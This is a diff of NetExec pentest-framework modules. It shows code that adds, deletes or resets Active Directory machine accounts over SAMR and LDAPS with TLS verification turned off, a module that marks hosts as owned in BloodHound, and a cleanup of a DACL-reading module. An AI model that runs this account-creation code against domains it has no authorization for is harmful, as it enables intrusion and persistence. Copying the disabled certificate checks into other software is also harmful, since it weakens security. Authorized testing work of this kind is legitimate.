samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)
|
|
||||||
domainSID = samrLookupDomainResponse['DomainId']
|
|
||||||
|
|
||||||
if logging.getLogger().level == logging.DEBUG:
|
|
||||||
logging.info("Opening domain %s..." % selectedDomain)
|
|
||||||
samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)
|
|
||||||
domainHandle = samrOpenDomainResponse['DomainHandle']
|
|
||||||
|
|
||||||
if self.__noAdd or self.__delete:
|
|
||||||
try:
|
|
||||||
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
|
|
||||||
except samr.DCERPCSessionError as e:
|
|
||||||
if e.error_code == 0xc0000073:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
self.__computerName + ' not found in domain ' + selectedDomain))
|
|
||||||
self.noLDAPRequired = True
|
|
||||||
raise Exception()
|
|
||||||
else:
|
|
||||||
raise
|
|
||||||
|
|
||||||
userRID = checkForUser['RelativeIds']['Element'][0]
|
|
||||||
if self.__delete:
|
|
||||||
access = samr.DELETE
|
|
||||||
message = "delete"
|
|
||||||
else:
|
|
||||||
access = samr.USER_FORCE_PASSWORD_CHANGE
|
|
||||||
message = "set the password for"
|
|
||||||
try:
|
|
||||||
openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)
|
|
||||||
userHandle = openUser['UserHandle']
|
|
||||||
except samr.DCERPCSessionError as e:
|
|
||||||
if e.error_code == 0xc0000022:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
self.__username + ' does not have the right to ' + message + " " + self.__computerName))
|
|
||||||
self.noLDAPRequired = True
|
|
||||||
raise Exception()
|
|
||||||
else:
|
|
||||||
raise
|
|
||||||
else:
|
|
||||||
if self.__computerName is not None:
|
|
||||||
try:
|
|
||||||
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
|
|
||||||
self.noLDAPRequired = True
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'Computer account already exists with the name: "' + self.__computerName + '"'))
|
|
||||||
raise Exception()
|
|
||||||
except samr.DCERPCSessionError as e:
|
|
||||||
if e.error_code != 0xc0000073:
|
|
||||||
raise
|
|
||||||
else:
|
|
||||||
foundUnused = False
|
|
||||||
while not foundUnused:
|
|
||||||
self.__computerName = self.generateComputerName()
|
|
||||||
try:
|
|
||||||
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
|
|
||||||
except samr.DCERPCSessionError as e:
|
|
||||||
if e.error_code == 0xc0000073:
|
|
||||||
foundUnused = True
|
|
||||||
else:
|
|
||||||
raise
|
|
||||||
try:
|
|
||||||
createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)
|
|
||||||
self.noLDAPRequired = True
|
|
||||||
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
|
|
||||||
except samr.DCERPCSessionError as e:
|
|
||||||
if e.error_code == 0xc0000022:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'The following user does not have the right to create a computer account: "' + self.__username + '"'))
|
|
||||||
raise Exception()
|
|
||||||
elif e.error_code == 0xc00002e7:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'The following user exceeded their machine account quota: "' + self.__username + '"'))
|
|
||||||
raise Exception()
|
|
||||||
else:
|
|
||||||
raise
|
|
||||||
userHandle = createUser['UserHandle']
|
|
||||||
|
|
||||||
if self.__delete:
|
|
||||||
samr.hSamrDeleteUser(dce, userHandle)
|
|
||||||
context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account'))
|
|
||||||
self.noLDAPRequired=True
|
|
||||||
userHandle = None
|
|
||||||
else:
|
|
||||||
samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)
|
|
||||||
if self.__noAdd:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'Successfully set the password of machine "' + self.__computerName + '" with password "' + self.__computerPassword + '"'))
|
|
||||||
self.noLDAPRequired=True
|
|
||||||
else:
|
|
||||||
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
|
|
||||||
userRID = checkForUser['RelativeIds']['Element'][0]
|
|
||||||
openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)
|
|
||||||
userHandle = openUser['UserHandle']
|
|
||||||
req = samr.SAMPR_USER_INFO_BUFFER()
|
|
||||||
req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
|
|
||||||
req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
|
|
||||||
samr.hSamrSetInformationUser2(dce, userHandle, req)
|
|
||||||
if not self.noLDAPRequired:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"'))
|
|
||||||
self.noLDAPRequired = True
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
if logging.getLogger().level == logging.DEBUG:
|
|
||||||
import traceback
|
|
||||||
traceback.print_exc()
|
|
||||||
finally:
|
|
||||||
if userHandle is not None:
|
|
||||||
samr.hSamrCloseHandle(dce, userHandle)
|
|
||||||
if domainHandle is not None:
|
|
||||||
samr.hSamrCloseHandle(dce, domainHandle)
|
|
||||||
if servHandle is not None:
|
|
||||||
samr.hSamrCloseHandle(dce, servHandle)
|
|
||||||
dce.disconnect()
|
|
||||||
|
|
||||||
def doLDAPSAdd(self, connection, context):
|
|
||||||
ldap_domain = connection.domain.replace(".", ",dc=")
|
|
||||||
spns = [
|
|
||||||
'HOST/%s' % self.__computerName,
|
|
||||||
'HOST/%s.%s' % (self.__computerName, connection.domain),
|
|
||||||
'RestrictedKrbHost/%s' % self.__computerName,
|
|
||||||
'RestrictedKrbHost/%s.%s' % (self.__computerName, connection.domain),
|
|
||||||
]
|
|
||||||
ucd = {
|
|
||||||
'dnsHostName': '%s.%s' % (self.__computerName, connection.domain),
|
|
||||||
'userAccountControl': 0x1000,
|
|
||||||
'servicePrincipalName': spns,
|
|
||||||
'sAMAccountName': self.__computerName,
|
|
||||||
'unicodePwd': ('"%s"' % self.__computerPassword).encode('utf-16-le')
|
|
||||||
}
|
|
||||||
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers='ALL:@SECLEVEL=0')
|
|
||||||
ldapServer = ldap3.Server(connection.host, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls)
|
|
||||||
c = Connection(ldapServer, connection.username + '@' + connection.domain, connection.password)
|
|
||||||
c.bind()
|
|
||||||
|
|
||||||
if (self.__delete):
|
|
||||||
result = c.delete("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain)
|
|
||||||
if result:
|
|
||||||
context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account'))
|
|
||||||
elif result == False and c.last_error == "noSuchObject":
|
|
||||||
context.log.highlight(u'{}'.format('Computer named "' + self.__computerName + '" was not found'))
|
|
||||||
elif result == False and c.last_error == "insufficientAccessRights":
|
|
||||||
context.log.highlight(
|
|
||||||
u'{}'.format('Insufficient Access Rights to delete the Computer "' + self.__computerName + '"'))
|
|
||||||
else:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'Unable to delete the "' + self.__computerName + '" Computer account. The error was: ' + c.last_error))
|
|
||||||
else:
|
|
||||||
result = c.add("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain,
|
|
||||||
['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd)
|
|
||||||
if result:
|
|
||||||
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
|
|
||||||
context.log.highlight(u'{}'.format('You can try to verify this with the nxc command:'))
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'nxc ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"'))
|
|
||||||
elif result == False and c.last_error == "entryAlreadyExists":
|
|
||||||
context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists'))
|
|
||||||
elif not result:
|
|
||||||
context.log.highlight(u'{}'.format(
|
|
||||||
'Unable to add the "' + self.__computerName + '" Computer account. The error was: ' + c.last_error))
|
|
||||||
c.unbind()
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author:
|
# Author:
|
||||||
# Romain Bentz (pixis - @hackanddo)
|
# Romain Bentz (pixis - @hackanddo)
|
||||||
# Website:
|
# Website:
|
||||||
|
@ -33,7 +31,6 @@ class NXCModule:
|
||||||
USER Username for Neo4j database (default: 'neo4j')
|
USER Username for Neo4j database (default: 'neo4j')
|
||||||
PASS Password for Neo4j database (default: 'neo4j')
|
PASS Password for Neo4j database (default: 'neo4j')
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.neo4j_URI = "127.0.0.1"
|
self.neo4j_URI = "127.0.0.1"
|
||||||
self.neo4j_Port = "7687"
|
self.neo4j_Port = "7687"
|
||||||
self.neo4j_user = "neo4j"
|
self.neo4j_user = "neo4j"
|
||||||
|
@ -49,10 +46,7 @@ class NXCModule:
|
||||||
self.neo4j_pass = module_options["PASS"]
|
self.neo4j_pass = module_options["PASS"]
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if context.local_auth:
|
domain = connection.conn.getServerDNSDomainName() if context.local_auth else connection.domain
|
||||||
domain = connection.conn.getServerDNSDomainName()
|
|
||||||
else:
|
|
||||||
domain = connection.domain
|
|
||||||
|
|
||||||
host_fqdn = f"{connection.hostname}.{domain}".upper()
|
host_fqdn = f"{connection.hostname}.{domain}".upper()
|
||||||
uri = f"bolt://{self.neo4j_URI}:{self.neo4j_Port}"
|
uri = f"bolt://{self.neo4j_URI}:{self.neo4j_Port}"
|
||||||
|
@ -62,7 +56,7 @@ class NXCModule:
|
||||||
try:
|
try:
|
||||||
driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False)
|
driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False)
|
||||||
except AuthError:
|
except AuthError:
|
||||||
context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" " not valid. See --options")
|
context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are not valid. See --options")
|
||||||
sys.exit()
|
sys.exit()
|
||||||
except ServiceUnavailable:
|
except ServiceUnavailable:
|
||||||
context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")
|
context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")
|
||||||
|
@ -73,15 +67,21 @@ class NXCModule:
|
||||||
sys.exit()
|
sys.exit()
|
||||||
|
|
||||||
with driver.session() as session:
|
with driver.session() as session:
|
||||||
with session.begin_transaction() as tx:
|
try:
|
||||||
result = tx.run(f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' " c.name AS name")
|
with session.begin_transaction() as tx:
|
||||||
record = result.single()
|
result = tx.run(f"MATCH (c:Computer {{name:{host_fqdn}}}) SET c.owned=True RETURN c.name AS name")
|
||||||
try:
|
record = result.single()
|
||||||
value = record.value()
|
try:
|
||||||
except AttributeError:
|
value = record.value()
|
||||||
value = []
|
except AttributeError:
|
||||||
|
value = []
|
||||||
|
except ServiceUnavailable as e:
|
||||||
|
context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")
|
||||||
|
context.log.debug(f"Error {e}: ")
|
||||||
|
driver.close()
|
||||||
|
sys.exit()
|
||||||
if len(value) > 0:
|
if len(value) > 0:
|
||||||
context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound")
|
context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" " imported the correct data?")
|
context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you imported the correct data?")
|
||||||
driver.close()
|
driver.close()
|
||||||
|
|
|
@ -10,6 +10,7 @@ from nxc.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
|
||||||
from ldap3.protocol.formatters.formatters import format_sid
|
from ldap3.protocol.formatters.formatters import format_sid
|
||||||
from ldap3.utils.conv import escape_filter_chars
|
from ldap3.utils.conv import escape_filter_chars
|
||||||
from ldap3.protocol.microsoft import security_descriptor_control
|
from ldap3.protocol.microsoft import security_descriptor_control
|
||||||
|
import sys
|
||||||
|
|
||||||
OBJECT_TYPES_GUID = {}
|
OBJECT_TYPES_GUID = {}
|
||||||
OBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)
|
OBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)
|
||||||
|
@ -64,7 +65,7 @@ WELL_KNOWN_SIDS = {
|
||||||
"S-1-5-64-14": "SChannel Authentication",
|
"S-1-5-64-14": "SChannel Authentication",
|
||||||
"S-1-5-64-21": "Digest Authority",
|
"S-1-5-64-21": "Digest Authority",
|
||||||
"S-1-5-80": "NT Service",
|
"S-1-5-80": "NT Service",
|
||||||
"S-1-5-83-0": "NT VIRTUAL MACHINE\Virtual Machines",
|
"S-1-5-83-0": "NT VIRTUAL MACHINE\\Virtual Machines",
|
||||||
"S-1-16-0": "Untrusted Mandatory Level",
|
"S-1-16-0": "Untrusted Mandatory Level",
|
||||||
"S-1-16-4096": "Low Mandatory Level",
|
"S-1-16-4096": "Low Mandatory Level",
|
||||||
"S-1-16-8192": "Medium Mandatory Level",
|
"S-1-16-8192": "Medium Mandatory Level",
|
||||||
|
@ -73,24 +74,24 @@ WELL_KNOWN_SIDS = {
|
||||||
"S-1-16-16384": "System Mandatory Level",
|
"S-1-16-16384": "System Mandatory Level",
|
||||||
"S-1-16-20480": "Protected Process Mandatory Level",
|
"S-1-16-20480": "Protected Process Mandatory Level",
|
||||||
"S-1-16-28672": "Secure Process Mandatory Level",
|
"S-1-16-28672": "Secure Process Mandatory Level",
|
||||||
"S-1-5-32-554": "BUILTIN\Pre-Windows 2000 Compatible Access",
|
"S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
|
||||||
"S-1-5-32-555": "BUILTIN\Remote Desktop Users",
|
"S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
|
||||||
"S-1-5-32-557": "BUILTIN\Incoming Forest Trust Builders",
|
"S-1-5-32-557": "BUILTIN\\Incoming Forest Trust Builders",
|
||||||
"S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
|
"S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
|
||||||
"S-1-5-32-558": "BUILTIN\Performance Monitor Users",
|
"S-1-5-32-558": "BUILTIN\\Performance Monitor Users",
|
||||||
"S-1-5-32-559": "BUILTIN\Performance Log Users",
|
"S-1-5-32-559": "BUILTIN\\Performance Log Users",
|
||||||
"S-1-5-32-560": "BUILTIN\Windows Authorization Access Group",
|
"S-1-5-32-560": "BUILTIN\\Windows Authorization Access Group",
|
||||||
"S-1-5-32-561": "BUILTIN\Terminal Server License Servers",
|
"S-1-5-32-561": "BUILTIN\\Terminal Server License Servers",
|
||||||
"S-1-5-32-562": "BUILTIN\Distributed COM Users",
|
"S-1-5-32-562": "BUILTIN\\Distributed COM Users",
|
||||||
"S-1-5-32-569": "BUILTIN\Cryptographic Operators",
|
"S-1-5-32-569": "BUILTIN\\Cryptographic Operators",
|
||||||
"S-1-5-32-573": "BUILTIN\Event Log Readers",
|
"S-1-5-32-573": "BUILTIN\\Event Log Readers",
|
||||||
"S-1-5-32-574": "BUILTIN\Certificate Service DCOM Access",
|
"S-1-5-32-574": "BUILTIN\\Certificate Service DCOM Access",
|
||||||
"S-1-5-32-575": "BUILTIN\RDS Remote Access Servers",
|
"S-1-5-32-575": "BUILTIN\\RDS Remote Access Servers",
|
||||||
"S-1-5-32-576": "BUILTIN\RDS Endpoint Servers",
|
"S-1-5-32-576": "BUILTIN\\RDS Endpoint Servers",
|
||||||
"S-1-5-32-577": "BUILTIN\RDS Management Servers",
|
"S-1-5-32-577": "BUILTIN\\RDS Management Servers",
|
||||||
"S-1-5-32-578": "BUILTIN\Hyper-V Administrators",
|
"S-1-5-32-578": "BUILTIN\\Hyper-V Administrators",
|
||||||
"S-1-5-32-579": "BUILTIN\Access Control Assistance Operators",
|
"S-1-5-32-579": "BUILTIN\\Access Control Assistance Operators",
|
||||||
"S-1-5-32-580": "BUILTIN\Remote Management Users",
|
"S-1-5-32-580": "BUILTIN\\Remote Management Users",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
@ -188,15 +189,15 @@ class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""Module to read and backup the Discretionary Access Control List of one or multiple objects.
|
||||||
Module to read and backup the Discretionary Access Control List of one or multiple objects.
|
|
||||||
This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.
|
This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.
|
||||||
It has been converted to an LDAPConnection session, and improvements on the filtering and the ability to specify multiple targets have been added.
|
It has been converted to an LDAPConnection session, and improvements on the filtering and the ability to specify multiple targets have been added.
|
||||||
It could be interesting to implement the write/remove functions here, but a ldap3 session instead of a LDAPConnection one is required to write.
|
It could be interesting to implement the write/remove functions here, but a ldap3 session instead of a LDAPConnection one is required to write.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = "daclread"
|
name = "daclread"
|
||||||
description = "Read and backup the Discretionary Access Control List of objects. Based on the work of @_nwodtuhs and @BlWasp_. Be carefull, this module cannot read the DACLS recursively, more explains in the options."
|
description = "Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options."
|
||||||
supported_protocols = ["ldap"]
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = False
|
multiple_hosts = False
|
||||||
|
@ -207,29 +208,37 @@ class NXCModule:
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
Be carefull, this module cannot read the DACLS recursively. For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.
|
Be careful, this module cannot read the DACLS recursively.
|
||||||
TARGET The objects that we want to read or backup the DACLs, sepcified by its SamAccountName
|
For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.
|
||||||
TARGET_DN The object that we want to read or backup the DACL, specified by its DN (usefull to target the domain itself)
|
|
||||||
|
TARGET The objects that we want to read or backup the DACLs, specified by its SamAccountName
|
||||||
|
TARGET_DN The object that we want to read or backup the DACL, specified by its DN (useful to target the domain itself)
|
||||||
PRINCIPAL The trustee that we want to filter on
|
PRINCIPAL The trustee that we want to filter on
|
||||||
ACTION The action to realise on the DACL (read, backup)
|
ACTION The action to realise on the DACL (read, backup)
|
||||||
ACE_TYPE The type of ACE to read (Allowed or Denied)
|
ACE_TYPE The type of ACE to read (Allowed or Denied)
|
||||||
RIGHTS An interesting right to filter on ('FullControl', 'ResetPassword', 'WriteMembers', 'DCSync')
|
RIGHTS An interesting right to filter on ('FullControl', 'ResetPassword', 'WriteMembers', 'DCSync')
|
||||||
RIGHTS_GUID A right GUID that specify a particular rights to filter on
|
RIGHTS_GUID A right GUID that specify a particular rights to filter on
|
||||||
|
|
||||||
|
Based on the work of @_nwodtuhs and @BlWasp_.
|
||||||
"""
|
"""
|
||||||
self.context = context
|
self.context = context
|
||||||
|
|
||||||
|
context.log.debug(f"module_options: {module_options}")
|
||||||
|
|
||||||
if not module_options:
|
if not module_options:
|
||||||
context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read")
|
context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if module_options and "TARGET" in module_options:
|
if module_options and "TARGET" in module_options:
|
||||||
|
context.log.debug("There is a target specified!")
|
||||||
if re.search(r"^(.+)\/([^\/]+)$", module_options["TARGET"]) is not None:
|
if re.search(r"^(.+)\/([^\/]+)$", module_options["TARGET"]) is not None:
|
||||||
try:
|
try:
|
||||||
self.target_file = open(module_options["TARGET"], "r")
|
self.target_file = open(module_options["TARGET"]) # noqa: SIM115
|
||||||
self.target_sAMAccountName = None
|
self.target_sAMAccountName = None
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.fail("The file doesn't exist or cannot be openned.")
|
context.log.fail("The file doesn't exist or cannot be openned.")
|
||||||
else:
|
else:
|
||||||
|
context.log.debug(f"Setting target_sAMAccountName to {module_options['TARGET']}")
|
||||||
self.target_sAMAccountName = module_options["TARGET"]
|
self.target_sAMAccountName = module_options["TARGET"]
|
||||||
self.target_file = None
|
self.target_file = None
|
||||||
self.target_DN = None
|
self.target_DN = None
|
||||||
|
@ -264,11 +273,8 @@ class NXCModule:
|
||||||
self.filename = None
|
self.filename = None
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""
|
"""On a successful LDAP login we perform a search for the targets' SID, their Security Descriptors and the principal's SID if there is one specified"""
|
||||||
On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified
|
context.log.highlight("Be careful, this module cannot read the DACLS recursively.")
|
||||||
"""
|
|
||||||
|
|
||||||
context.log.highlight("Be carefull, this module cannot read the DACLS recursively.")
|
|
||||||
self.baseDN = connection.ldapConnection._baseDN
|
self.baseDN = connection.ldapConnection._baseDN
|
||||||
self.ldap_session = connection.ldapConnection
|
self.ldap_session = connection.ldapConnection
|
||||||
|
|
||||||
|
@ -279,20 +285,16 @@ class NXCModule:
|
||||||
self.principal_sid = format_sid(
|
self.principal_sid = format_sid(
|
||||||
self.ldap_session.search(
|
self.ldap_session.search(
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
|
searchFilter=f"(sAMAccountName={escape_filter_chars(_lookedup_principal)})",
|
||||||
attributes=["objectSid"],
|
attributes=["objectSid"],
|
||||||
)[0][
|
)[0][1][0][1][0]
|
||||||
1
|
|
||||||
][0][
|
|
||||||
1
|
|
||||||
][0]
|
|
||||||
)
|
)
|
||||||
context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid)
|
context.log.highlight(f"Found principal SID to filter on: {self.principal_sid}")
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal)
|
context.log.fail(f"Principal SID not found in LDAP ({_lookedup_principal})")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
# Searching for the targets SID and their Security Decriptors
|
# Searching for the targets SID and their Security Descriptors
|
||||||
# If there is only one target
|
# If there is only one target
|
||||||
if (self.target_sAMAccountName or self.target_DN) and self.target_file is None:
|
if (self.target_sAMAccountName or self.target_DN) and self.target_file is None:
|
||||||
# Searching for target account with its security descriptor
|
# Searching for target account with its security descriptor
|
||||||
|
@ -302,10 +304,10 @@ class NXCModule:
|
||||||
self.target_principal_dn = self.target_principal[0]
|
self.target_principal_dn = self.target_principal[0]
|
||||||
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
|
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
|
||||||
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
|
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
|
||||||
context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0])
|
context.log.highlight(f"Target principal found in LDAP ({self.target_principal[0]})")
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
|
context.log.fail(f"Target SID not found in LDAP ({self.target_sAMAccountName})")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if self.action == "read":
|
if self.action == "read":
|
||||||
self.read(context)
|
self.read(context)
|
||||||
|
@ -324,9 +326,9 @@ class NXCModule:
|
||||||
self.target_principal_dn = self.target_principal[0]
|
self.target_principal_dn = self.target_principal[0]
|
||||||
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
|
self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1")
|
||||||
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
|
self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor)
|
||||||
context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName)
|
context.log.highlight(f"Target principal found in LDAP ({self.target_sAMAccountName})")
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName)
|
context.log.fail(f"Target SID not found in LDAP ({self.target_sAMAccountName})")
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if self.action == "read":
|
if self.action == "read":
|
||||||
|
@ -339,7 +341,6 @@ class NXCModule:
|
||||||
def read(self, context):
|
def read(self, context):
|
||||||
parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"])
|
parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"])
|
||||||
self.print_parsed_dacl(context, parsed_dacl)
|
self.print_parsed_dacl(context, parsed_dacl)
|
||||||
return
|
|
||||||
|
|
||||||
# Permits to export the DACL of the targets
|
# Permits to export the DACL of the targets
|
||||||
# This function is called before any writing action (write, remove or restore)
|
# This function is called before any writing action (write, remove or restore)
|
||||||
|
@ -348,7 +349,7 @@ class NXCModule:
|
||||||
backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1")
|
backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1")
|
||||||
backup["dn"] = str(self.target_principal_dn)
|
backup["dn"] = str(self.target_principal_dn)
|
||||||
if not self.filename:
|
if not self.filename:
|
||||||
self.filename = "dacledit-%s-%s.bak" % (
|
self.filename = "dacledit-{}-{}.bak".format(
|
||||||
datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
|
datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
|
||||||
self.target_sAMAccountName,
|
self.target_sAMAccountName,
|
||||||
)
|
)
|
||||||
|
@ -366,7 +367,7 @@ class NXCModule:
|
||||||
_lookedup_principal = self.target_sAMAccountName
|
_lookedup_principal = self.target_sAMAccountName
|
||||||
target = self.ldap_session.search(
|
target = self.ldap_session.search(
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
|
searchFilter=f"(sAMAccountName={escape_filter_chars(_lookedup_principal)})",
|
||||||
attributes=["nTSecurityDescriptor"],
|
attributes=["nTSecurityDescriptor"],
|
||||||
searchControls=controls,
|
searchControls=controls,
|
||||||
)
|
)
|
||||||
|
@ -374,61 +375,54 @@ class NXCModule:
|
||||||
_lookedup_principal = self.target_DN
|
_lookedup_principal = self.target_DN
|
||||||
target = self.ldap_session.search(
|
target = self.ldap_session.search(
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(distinguishedName=%s)" % _lookedup_principal,
|
searchFilter=f"(distinguishedName={_lookedup_principal})",
|
||||||
attributes=["nTSecurityDescriptor"],
|
attributes=["nTSecurityDescriptor"],
|
||||||
searchControls=controls,
|
searchControls=controls,
|
||||||
)
|
)
|
||||||
try:
|
try:
|
||||||
self.target_principal = target[0]
|
self.target_principal = target[0]
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal)
|
context.log.fail(f"Principal not found in LDAP ({_lookedup_principal}), probably an LDAP session issue.")
|
||||||
exit(0)
|
sys.exit(0)
|
||||||
|
|
||||||
# Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName
|
# Attempts to retrieve the SID and Distinguisehd Name from the sAMAccountName
|
||||||
# Not used for the moment
|
# Not used for the moment
|
||||||
# - samname : a sAMAccountName
|
# - samname : a sAMAccountName
|
||||||
def get_user_info(self, context, samname):
|
def get_user_info(self, context, samname):
|
||||||
self.ldap_session.search(
|
self.ldap_session.search(
|
||||||
searchBase=self.baseDN,
|
searchBase=self.baseDN,
|
||||||
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(samname),
|
searchFilter=f"(sAMAccountName={escape_filter_chars(samname)})",
|
||||||
attributes=["objectSid"],
|
attributes=["objectSid"],
|
||||||
)
|
)
|
||||||
try:
|
try:
|
||||||
dn = self.ldap_session.entries[0].entry_dn
|
dn = self.ldap_session.entries[0].entry_dn
|
||||||
sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0])
|
sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0])
|
||||||
return dn, sid
|
return dn, sid
|
||||||
except Exception as e:
|
except Exception:
|
